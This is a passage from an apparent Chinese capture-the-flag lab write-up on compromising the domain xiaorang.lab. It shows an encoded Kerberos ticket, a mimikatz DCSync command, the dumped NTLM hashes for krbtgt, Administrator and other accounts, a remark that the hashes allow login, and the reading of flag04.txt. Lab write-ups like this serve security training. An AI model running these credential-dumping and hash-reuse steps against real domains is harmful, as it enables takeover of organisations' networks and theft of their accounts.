MDA1Mjg0N1qmERgPMjAyNTAyMTAxNTI4NDdapxEYDzIwMjUwMjE3MDUyODQ3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
mimikatz.exe "lsadump::dcsync /all /csv"
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  767e06b9c74fd628dd13785006a9092b        514
1105    Aldrich 98ce19dd5ce74f670d230c7b1aa016d0        512
1106    Marcus  b91c7cc463735bf0e599a2d0a04df110        512
1112    WIN-3X7U15C2XDM$        c3ddf0ffd17c48e6c40e6eda9c9fbaf7        4096
1113    WIN-YUUAW2QG9MF$        125d0e9790105be68deb6002690fc91b        4096
1000    DC01$   23414273a692373e6e076d5fdbb2c213        532480
500     Administrator   4889f6553239ace1f7c47fa2c619c252        512
1103    FILESERVER$     dd213f63df5b16b2daa567705ca88ac7        4096
1104    WIN19$  b6547b5e9c27c42b5cb096f1c922bc3a        528384

可以拿到域控的哈希

然后登录即可

1
C:\Users\Administrator\flag> type flag04.txt
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!